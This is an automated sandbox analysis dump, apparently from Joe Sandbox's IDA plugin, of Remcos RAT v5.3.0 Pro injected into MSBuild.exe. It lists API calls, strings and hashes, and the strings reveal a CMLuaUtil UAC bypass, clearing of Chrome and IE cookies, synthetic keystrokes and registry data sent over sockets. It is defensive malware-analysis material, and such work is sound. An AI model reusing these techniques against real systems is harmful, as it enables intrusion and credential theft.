                                                                                                                        • Instruction ID: b2aa677fe1363808454ef9d3704f93b9908b7cd688e3fd59dcdd6ad405d7ff49
                                                                                                                        • Opcode Fuzzy Hash: 0bcdf1af44f42523717d6e0888b3946a9b799004678d95474f77185bdb4abe82
                                                                                                                        • Instruction Fuzzy Hash: 0D41A0316042019BC324FB65DCA6EAE73A4EB94318F00453FF54AA71F2DF78A945C65E
                                                                                                                        APIs
                                                                                                                        • CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000,00465454,?,?,00000000,00407273,00000000,?,0000000A,00000000), ref: 00406C38
                                                                                                                        • WriteFile.KERNEL32(00000000,?,00000000,?,00000000,?,000186A0,?,?,?,00000000,00407273,00000000,?,0000000A,00000000), ref: 00406C80
                                                                                                                          • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                                                                                        • CloseHandle.KERNEL32(00000000,?,?,00000000,00407273,00000000,?,0000000A,00000000,00000000), ref: 00406CC0
                                                                                                                        • MoveFileW.KERNEL32(00000000,00000000), ref: 00406CDD
                                                                                                                        • CloseHandle.KERNEL32(00000000,00000057,?,00000008,?,?,?,?,?,?,0000000A,00000000,00000000), ref: 00406D08
                                                                                                                        • DeleteFileW.KERNEL32(00000000,?,?,?,?,?,?,0000000A,00000000,00000000), ref: 00406D18
                                                                                                                          • Part of subcall function 0040455B: WaitForSingleObject.KERNEL32(?,000000FF,?,?,0040460E,00000000,?,?), ref: 0040456A
                                                                                                                          • Part of subcall function 0040455B: SetEvent.KERNEL32(?,?,?,0040460E,00000000,?,?), ref: 00404588
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: File$CloseHandle$CreateDeleteEventMoveObjectSingleWaitWritesend
                                                                                                                        • String ID: .part
                                                                                                                        • API String ID: 1303771098-3499674018
                                                                                                                        • Opcode ID: d50e3930c99f8cddacc32f51ad6110cbbcfbd567f3e003bfc65bfd9ee2b121de
                                                                                                                        • Instruction ID: a9f2b94bfe891e644ef5b97f564769cd4b441703f4f7d546a0b6aea2ef9939f1
                                                                                                                        • Opcode Fuzzy Hash: d50e3930c99f8cddacc32f51ad6110cbbcfbd567f3e003bfc65bfd9ee2b121de
                                                                                                                        • Instruction Fuzzy Hash: 1C31C2715083019FD210EF21DD459AFB7A8FB85715F40093FF9C6A21A1DB38AA48CB9A
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00412584: RegOpenKeyExW.ADVAPI32(80000001,00000400,00000000,00020019,?), ref: 004125A6
                                                                                                                          • Part of subcall function 00412584: RegQueryValueExW.ADVAPI32(?,0040E0BA,00000000,00000000,?,00000400), ref: 004125C5
                                                                                                                          • Part of subcall function 00412584: RegCloseKey.ADVAPI32(?), ref: 004125CE
                                                                                                                          • Part of subcall function 0041B15B: GetCurrentProcess.KERNEL32(?,?,?,0040C914,WinDir,00000000,00000000), ref: 0041B16C
                                                                                                                        • _wcslen.LIBCMT ref: 0041A8F6
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: CloseCurrentOpenProcessQueryValue_wcslen
                                                                                                                        • String ID: .exe$:@$XCG$http\shell\open\command$program files (x86)\$program files\
                                                                                                                        • API String ID: 37874593-703403762
                                                                                                                        • Opcode ID: aa5f3d36ce9772210bd4ab0c541c77e8bdbd068386b6e6afd822d477f8b40dee
                                                                                                                        • Instruction ID: cf464564bb47d370653928ac6653466accee15d45f6204cdc17a1bec324f9b19
                                                                                                                        • Opcode Fuzzy Hash: aa5f3d36ce9772210bd4ab0c541c77e8bdbd068386b6e6afd822d477f8b40dee
                                                                                                                        • Instruction Fuzzy Hash: 3021B8727001043BDB04BAB58C96DEE366D9B85358F14083FF402F72C2ED3C9D5942A9
                                                                                                                        APIs
                                                                                                                        • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,0043D564,0043D564,?,?,?,00449BA1,00000001,00000001,1AE85006), ref: 004499AA
                                                                                                                        • __alloca_probe_16.LIBCMT ref: 004499E2
                                                                                                                        • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00449BA1,00000001,00000001,1AE85006,?,?,?), ref: 00449A30
                                                                                                                        • __alloca_probe_16.LIBCMT ref: 00449AC7
                                                                                                                        • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,1AE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00449B2A
                                                                                                                        • __freea.LIBCMT ref: 00449B37
                                                                                                                          • Part of subcall function 00446AFF: RtlAllocateHeap.NTDLL(00000000,00434403,?,?,00437227,?,?,?,?,?,0040CC87,00434403,?,?,?,?), ref: 00446B31
                                                                                                                        • __freea.LIBCMT ref: 00449B40
                                                                                                                        • __freea.LIBCMT ref: 00449B65
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3864826663-0
                                                                                                                        • Opcode ID: 352025556551dac2c37919268567461b7de28f4f732b96d5dc4c3903fd0b0184
                                                                                                                        • Instruction ID: d3450b84a68f20df6837e20b70452335b33749c243a385fd48b45426a0ff81fe
                                                                                                                        • Opcode Fuzzy Hash: 352025556551dac2c37919268567461b7de28f4f732b96d5dc4c3903fd0b0184
                                                                                                                        • Instruction Fuzzy Hash: 89511572610246AFFB258F65DC81EBB77A9EB44754F15462EFC04E6240EF38EC40E668
                                                                                                                        APIs
                                                                                                                        • SendInput.USER32 ref: 00418B08
                                                                                                                        • SendInput.USER32(00000001,?,0000001C), ref: 00418B30
                                                                                                                        • SendInput.USER32(00000001,0000001C,0000001C), ref: 00418B57
                                                                                                                        • SendInput.USER32(00000001,0000001C,0000001C), ref: 00418B75
                                                                                                                        • SendInput.USER32(00000001,0000001C,0000001C), ref: 00418B95
                                                                                                                        • SendInput.USER32(00000001,0000001C,0000001C), ref: 00418BBA
                                                                                                                        • SendInput.USER32(00000001,0000001C,0000001C), ref: 00418BDC
                                                                                                                        • SendInput.USER32(00000001,?,0000001C), ref: 00418BFF
                                                                                                                          • Part of subcall function 00418AB1: MapVirtualKeyA.USER32(00000000,00000000), ref: 00418AB7
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: InputSend$Virtual
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1167301434-0
                                                                                                                        • Opcode ID: 88f93acc81d4616b4190e12117d1b14dafb1e9928c91053c24dee7c09840eeb6
                                                                                                                        • Instruction ID: ee8b26819532887277ba411a2a2a0296f2420856d0f10470abe43a11d9a37015
                                                                                                                        • Opcode Fuzzy Hash: 88f93acc81d4616b4190e12117d1b14dafb1e9928c91053c24dee7c09840eeb6
                                                                                                                        • Instruction Fuzzy Hash: 3231A471248345AAE210DF65D841FDFFBECAFC5B44F04080FB98457291DAA4D98C87AB
                                                                                                                        APIs
                                                                                                                        • _free.LIBCMT ref: 00447EBC
                                                                                                                        • _free.LIBCMT ref: 00447EE0
                                                                                                                        • _free.LIBCMT ref: 00448067
                                                                                                                        • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045D478), ref: 00448079
                                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,0047179C,000000FF,00000000,0000003F,00000000,?,?), ref: 004480F1
                                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,004717F0,000000FF,?,0000003F,00000000,?), ref: 0044811E
                                                                                                                        • _free.LIBCMT ref: 00448233
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: _free$ByteCharMultiWide$InformationTimeZone
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 314583886-0
                                                                                                                        • Opcode ID: 0db77cb6a5e89d3bc4573ca623af4d9606dd509ec69084a3c4c6f4a44b83d65d
                                                                                                                        • Instruction ID: d74e55ca02e924b9256a88f94e7be2aa31ce1fd8fbfcff02d88bcfbefc6cbd9d
                                                                                                                        • Opcode Fuzzy Hash: 0db77cb6a5e89d3bc4573ca623af4d9606dd509ec69084a3c4c6f4a44b83d65d
                                                                                                                        • Instruction Fuzzy Hash: 32C12871904205ABFB24DF799C41AAE7BB8EF46314F2441AFE484A7351EB388E47C758
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: _free
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 269201875-0
                                                                                                                        • Opcode ID: 154a0d9c569a12efbd1fb523a4d55ce0e4318de2d30962be95ff360cd9ef53d7
                                                                                                                        • Instruction ID: 5fecc71d39e6a90402c47f7728bb4f6831cdfeb90858b0dfc168023e2edb8b83
                                                                                                                        • Opcode Fuzzy Hash: 154a0d9c569a12efbd1fb523a4d55ce0e4318de2d30962be95ff360cd9ef53d7
                                                                                                                        • Instruction Fuzzy Hash: 2361BFB1900205AFEB20DF69C841BAABBF4EB45720F24417BE944FB392E7349D45CB59
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00446AFF: RtlAllocateHeap.NTDLL(00000000,00434403,?,?,00437227,?,?,?,?,?,0040CC87,00434403,?,?,?,?), ref: 00446B31
                                                                                                                        • _free.LIBCMT ref: 00444086
                                                                                                                        • _free.LIBCMT ref: 0044409D
                                                                                                                        • _free.LIBCMT ref: 004440BC
                                                                                                                        • _free.LIBCMT ref: 004440D7
                                                                                                                        • _free.LIBCMT ref: 004440EE
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: _free$AllocateHeap
                                                                                                                        • String ID: J7D
                                                                                                                        • API String ID: 3033488037-1677391033
                                                                                                                        • Opcode ID: 7bd75c35ecc30b271b00b77e92f4063212cf76abbfff81b413b55d476d69b5fb
                                                                                                                        • Instruction ID: b5a2c1f2d034459fb850ff781f480331835685433a1d37f27cfcf8091ebf3f31
                                                                                                                        • Opcode Fuzzy Hash: 7bd75c35ecc30b271b00b77e92f4063212cf76abbfff81b413b55d476d69b5fb
                                                                                                                        • Instruction Fuzzy Hash: 9251E371A00604AFEB20DF6AC841B6AB3F4EF95724F14416EE909D7251E739ED15CB88
                                                                                                                        APIs
                                                                                                                        • GetConsoleCP.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,0044A838,?,00000000,00000000,00000000,00000000,0000000C), ref: 0044A105
                                                                                                                        • __fassign.LIBCMT ref: 0044A180
                                                                                                                        • __fassign.LIBCMT ref: 0044A19B
                                                                                                                        • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,00000000,00000005,00000000,00000000), ref: 0044A1C1
                                                                                                                        • WriteFile.KERNEL32(?,00000000,00000000,0044A838,00000000,?,?,?,?,?,?,?,?,?,0044A838,?), ref: 0044A1E0
                                                                                                                        • WriteFile.KERNEL32(?,?,00000001,0044A838,00000000,?,?,?,?,?,?,?,?,?,0044A838,?), ref: 0044A219
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1324828854-0
                                                                                                                        • Opcode ID: c2a57007ecaabeafdb2dea6b541a07f99f491d21749d301156e70ae2fc22959b
                                                                                                                        • Instruction ID: b40464c9ec282996611fef5cbd20273031f87559cdf671a411eba52403cbf28d
                                                                                                                        • Opcode Fuzzy Hash: c2a57007ecaabeafdb2dea6b541a07f99f491d21749d301156e70ae2fc22959b
                                                                                                                        • Instruction Fuzzy Hash: DB51E270E002099FEB10CFA8D881AEEBBF8FF09300F14416BE815E3391D6749951CB6A
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: _free
                                                                                                                        • String ID: HE$HE
                                                                                                                        • API String ID: 269201875-1978648262
                                                                                                                        • Opcode ID: fc29a47a32afb3350fc3e3c96543f328580f9b5143c0f3ce58bfce5294a38304
                                                                                                                        • Instruction ID: 4134de32792d44acead4bb36f8da9b5b282593f8ffe10db144b1eaf4d9577b64
                                                                                                                        • Opcode Fuzzy Hash: fc29a47a32afb3350fc3e3c96543f328580f9b5143c0f3ce58bfce5294a38304
                                                                                                                        • Instruction Fuzzy Hash: 90412A31A009106BEF24AABA8CD5A7F3B64DF45375F14031BFC1896293D67C8C4996AA
                                                                                                                        APIs
                                                                                                                        • RegOpenKeyExW.ADVAPI32(00000000,00000000,00000000,00020019,?), ref: 00412CC1
                                                                                                                          • Part of subcall function 004129AA: RegQueryInfoKeyW.ADVAPI32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00412A1D
                                                                                                                          • Part of subcall function 004129AA: RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?,?,?,?,00000000,?,?,?,?), ref: 00412A4C
                                                                                                                          • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                                                                                        • RegCloseKey.ADVAPI32(TUFTUF,00465554,00465554,00465900,00465900,00000071), ref: 00412E31
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: CloseEnumInfoOpenQuerysend
                                                                                                                        • String ID: TUFTUF$>G$DG$DG
                                                                                                                        • API String ID: 3114080316-344394840
                                                                                                                        • Opcode ID: 5ada2776117986fdda91317c1ef980534e519c22f238f3628a5ce40721f5b323
                                                                                                                        • Instruction ID: 92049c6ae7fba3f13a57cd60a3827c89810429dfa6cf24b756c0ab1f01d338b1
                                                                                                                        • Opcode Fuzzy Hash: 5ada2776117986fdda91317c1ef980534e519c22f238f3628a5ce40721f5b323
                                                                                                                        • Instruction Fuzzy Hash: 0141A2316042009BC224F635D9A2AEF7394AFD0708F50843FF94A671E2EF7C5D4986AE
                                                                                                                        APIs
                                                                                                                        • _ValidateLocalCookies.LIBCMT ref: 00437AAB
                                                                                                                        • ___except_validate_context_record.LIBVCRUNTIME ref: 00437AB3
                                                                                                                        • _ValidateLocalCookies.LIBCMT ref: 00437B41
                                                                                                                        • __IsNonwritableInCurrentImage.LIBCMT ref: 00437B6C
                                                                                                                        • _ValidateLocalCookies.LIBCMT ref: 00437BC1
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                        • String ID: csm
                                                                                                                        • API String ID: 1170836740-1018135373
                                                                                                                        • Opcode ID: a717e1e029c36c18052b78818950a58a3847fd0af0d72a643a188b4f53f37093
                                                                                                                        • Instruction ID: 9404c61c081bc4e6da2099be8a52027e1297fde76841380def533d3eaa533744
                                                                                                                        • Opcode Fuzzy Hash: a717e1e029c36c18052b78818950a58a3847fd0af0d72a643a188b4f53f37093
                                                                                                                        • Instruction Fuzzy Hash: CD410970A04209DBCF20EF19C844A9FBBB5AF0932CF14915BE8556B392D739EE05CB95
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00412513: RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 00412537
                                                                                                                          • Part of subcall function 00412513: RegQueryValueExA.KERNEL32(?,?,00000000,00000000,?,00000400), ref: 00412554
                                                                                                                          • Part of subcall function 00412513: RegCloseKey.KERNEL32(?), ref: 0041255F
                                                                                                                        • ExpandEnvironmentStringsA.KERNEL32(00000000,?,00000104,00000000), ref: 0040B76C
                                                                                                                        • PathFileExistsA.SHLWAPI(?), ref: 0040B779
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
Yara matches
Similarity
• API ID: CloseEnvironmentExistsExpandFileOpenPathQueryStringsValue
• String ID: [IE cookies cleared!]$[IE cookies not found]$Cookies$Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
• API String ID: 1133728706-4073444585
• Opcode ID: 76dec9bc07e0ce05070ce1aa69bd4cc692330d266f7d642bb6ee31461e7252f1
• Instruction ID: d844a8c095f6bc09782a4352348c5dfd082864f820bca84d12e352ec49be167e
• Opcode Fuzzy Hash: 76dec9bc07e0ce05070ce1aa69bd4cc692330d266f7d642bb6ee31461e7252f1
• Instruction Fuzzy Hash: 5F216D71A00109A6CB04F7B2DCA69EE7764AE95318F40013FE902771D2EB7C9A49C6DE
Memory Dump Source
• Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: ac8429af2de8aec4c7be5426e4bb47fdde12a831901fd5511e93482c0d59407e
• Instruction ID: 969edc756a0dffe936139f0dc9bce31aed38431af2e56c5058bd22e5c2f4fad6
• Opcode Fuzzy Hash: ac8429af2de8aec4c7be5426e4bb47fdde12a831901fd5511e93482c0d59407e
• Instruction Fuzzy Hash: 991124B1508654FBDB202F769C4493B3B6CEF82376B10016FFC15D7242DA7C8805C2AA
APIs
• std::_Lockit::_Lockit.LIBCPMT ref: 0040FBFC
• int.LIBCPMT ref: 0040FC0F
  • Part of subcall function 0040CEE0: std::_Lockit::_Lockit.LIBCPMT ref: 0040CEF1
  • Part of subcall function 0040CEE0: std::_Lockit::~_Lockit.LIBCPMT ref: 0040CF0B
• std::_Facet_Register.LIBCPMT ref: 0040FC4B
• std::_Lockit::~_Lockit.LIBCPMT ref: 0040FC71
• __CxxThrowException@8.LIBVCRUNTIME ref: 0040FC8D
Strings
Memory Dump Source
• Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
Yara matches
Similarity
• API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrow
• String ID: P[G
• API String ID: 2536120697-571123470
• Opcode ID: 080c8d6f573d4b518caf4e655f0fcc3a1f7fca7e624085fd0a478c15266a48d0
• Instruction ID: a46b155a0a589d4ea75c4983af6a631921b9d9812a15003568faaf62f6f01cf1
• Opcode Fuzzy Hash: 080c8d6f573d4b518caf4e655f0fcc3a1f7fca7e624085fd0a478c15266a48d0
• Instruction Fuzzy Hash: 7611F331904518A7CB14FBA5D8469DEB7689E44358B20007BF905B72C1EB7CAE45C79D
APIs
  • Part of subcall function 0044FA22: _free.LIBCMT ref: 0044FA4B
• _free.LIBCMT ref: 0044FD29
  • Part of subcall function 00446AC5: RtlFreeHeap.NTDLL(00000000,00000000,?,0044FA50,0000000A,00000000,0000000A,00000000,?,0044FCF4,0000000A,00000007,0000000A,?,00450205,0000000A), ref: 00446ADB
  • Part of subcall function 00446AC5: GetLastError.KERNEL32(0000000A,?,0044FA50,0000000A,00000000,0000000A,00000000,?,0044FCF4,0000000A,00000007,0000000A,?,00450205,0000000A,0000000A), ref: 00446AED
• _free.LIBCMT ref: 0044FD34
• _free.LIBCMT ref: 0044FD3F
• _free.LIBCMT ref: 0044FD93
• _free.LIBCMT ref: 0044FD9E
• _free.LIBCMT ref: 0044FDA9
• _free.LIBCMT ref: 0044FDB4
Memory Dump Source
• Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
Yara matches
Similarity
• API ID: _free$ErrorFreeHeapLast
• String ID:
• API String ID: 776569668-0
• Opcode ID: 7c29d87e7d6a666a6374703866dd42c53a280d6db8acc668fe4e1522d65ba280
• Instruction ID: b6f47af98b99390d2ca34363280ce03bc5e4d1be0f6c4f29549f69d6ae0d3a9a
• Opcode Fuzzy Hash: 7c29d87e7d6a666a6374703866dd42c53a280d6db8acc668fe4e1522d65ba280
• Instruction Fuzzy Hash: 5F119031711B04B6F520FBB2CC07FCBB7DC9F42308F814C2EB29E76152E628A9184645
APIs
• CoInitializeEx.OLE32(00000000,00000002,00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe), ref: 00406835
  • Part of subcall function 00406764: _wcslen.LIBCMT ref: 00406788
  • Part of subcall function 00406764: CoGetObject.OLE32(?,00000024,004659B0,00000000), ref: 004067E9
• CoUninitialize.OLE32 ref: 0040688E
Strings
Memory Dump Source
• Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
Yara matches
Similarity
• API ID: InitializeObjectUninitialize_wcslen
• String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe$[+] ShellExec success$[+] before ShellExec$[+] ucmCMLuaUtilShellExecMethod
• API String ID: 3851391207-1840432179
• Opcode ID: cc256bbe825efe690782e207798e63cf697be23d062579cdcaa40baaa38e88a5
• Instruction ID: 622c6236034ee416db36617ed9a374104512909f75adacabffe0517dc70a223e
• Opcode Fuzzy Hash: cc256bbe825efe690782e207798e63cf697be23d062579cdcaa40baaa38e88a5
• Instruction Fuzzy Hash: A501C0722013106FE2287B11DC0EF3B2658DB4176AF22413FF946A71C1EAA9AC104669
APIs
• std::_Lockit::_Lockit.LIBCPMT ref: 0040FEDF
• int.LIBCPMT ref: 0040FEF2
  • Part of subcall function 0040CEE0: std::_Lockit::_Lockit.LIBCPMT ref: 0040CEF1
  • Part of subcall function 0040CEE0: std::_Lockit::~_Lockit.LIBCPMT ref: 0040CF0B
• std::_Facet_Register.LIBCPMT ref: 0040FF2E
• std::_Lockit::~_Lockit.LIBCPMT ref: 0040FF54
• __CxxThrowException@8.LIBVCRUNTIME ref: 0040FF70
Strings
Memory Dump Source
• Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
Yara matches
Similarity
• API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrow
• String ID: H]G
• API String ID: 2536120697-1717957184
• Opcode ID: 4f42b0104d3fab8d9c54d588918312ac25f5cdf33bdc383dd9a32706d08bdfcf
• Instruction ID: c39742161ac3258eace465d30f2780732a1ff9819e97f4bd037edafe9ec39b9f
• Opcode Fuzzy Hash: 4f42b0104d3fab8d9c54d588918312ac25f5cdf33bdc383dd9a32706d08bdfcf
• Instruction Fuzzy Hash: 9011BF31900419ABCB24FBA5C8468DDB7799F95318B20007FF505B72C1EB78AF09C799
APIs
• DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Cookies), ref: 0040B2E4
• GetLastError.KERNEL32 ref: 0040B2EE
Strings
• \AppData\Local\Google\Chrome\User Data\Default\Cookies, xrefs: 0040B2AF
• [Chrome Cookies found, cleared!], xrefs: 0040B314
• [Chrome Cookies not found], xrefs: 0040B308
• UserProfile, xrefs: 0040B2B4
Memory Dump Source
• Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
Yara matches
Similarity
• API ID: DeleteErrorFileLast
• String ID: [Chrome Cookies found, cleared!]$[Chrome Cookies not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Cookies
• API String ID: 2018770650-304995407
• Opcode ID: dfe89a798b749c9bba519fdb19838f0c49607846c9f20ba5960bfc3478b55717
• Instruction ID: 647c9f6895dd19beb09db90be4e639f81332b1b521455d1adc7a9c6a9ee315b4
• Opcode Fuzzy Hash: dfe89a798b749c9bba519fdb19838f0c49607846c9f20ba5960bfc3478b55717
• Instruction Fuzzy Hash: 3301A23164410557CB047BB5DD6B8AF3624ED50708F60013FF802B32E2FE3A9A0586CE
APIs
• AllocConsole.KERNEL32(00474358), ref: 0041BEB9
• ShowWindow.USER32(00000000,00000000), ref: 0041BED2
• SetConsoleOutputCP.KERNEL32(000004E4), ref: 0041BEF7
Strings
Memory Dump Source
• Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
Yara matches
Similarity
• API ID: Console$AllocOutputShowWindow
• String ID: Remcos v$5.3.0 Pro$CONOUT$
• API String ID: 2425139147-2527699604
• Opcode ID: 665a097808b038229c9a37eafed355beb7ea993dcaa7ec452e19bba1328996a1
• Instruction ID: 482f1cdaf256b8236abc94a0b12de3dc55517b66349f776fa4240982defd8f75
• Opcode Fuzzy Hash: 665a097808b038229c9a37eafed355beb7ea993dcaa7ec452e19bba1328996a1
• Instruction Fuzzy Hash: 180171B19803047BD600FBF29D4BFDD37AC9B14705F5004277644E7093EABCA554866D
Strings
Memory Dump Source
• Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
Yara matches
Similarity
• API ID:
• String ID: (CG$C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe$BG
• API String ID: 0-3446331285
• Opcode ID: b7a2e59ac2a9b4cfd69ae58ffa53ef09c4b6135ca76893af750d01e39a00b3fe
• Instruction ID: a0817f974ad937f6cb5b9dd001e5131ae01746641b95ac10126ddf8aadfa6e31
• Opcode Fuzzy Hash: b7a2e59ac2a9b4cfd69ae58ffa53ef09c4b6135ca76893af750d01e39a00b3fe
• Instruction Fuzzy Hash: 05F096B17022109BDB103774BC1967A3645A780356F01847BF94BFA6E5DB3C8851869C
APIs
  • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
• GetModuleHandleA.KERNEL32(00000000,00020009), ref: 00419F64
• PlaySoundW.WINMM(00000000,00000000), ref: 00419F72
• Sleep.KERNEL32(00002710), ref: 00419F79
• PlaySoundW.WINMM(00000000,00000000,00000000), ref: 00419F82
Strings
Memory Dump Source
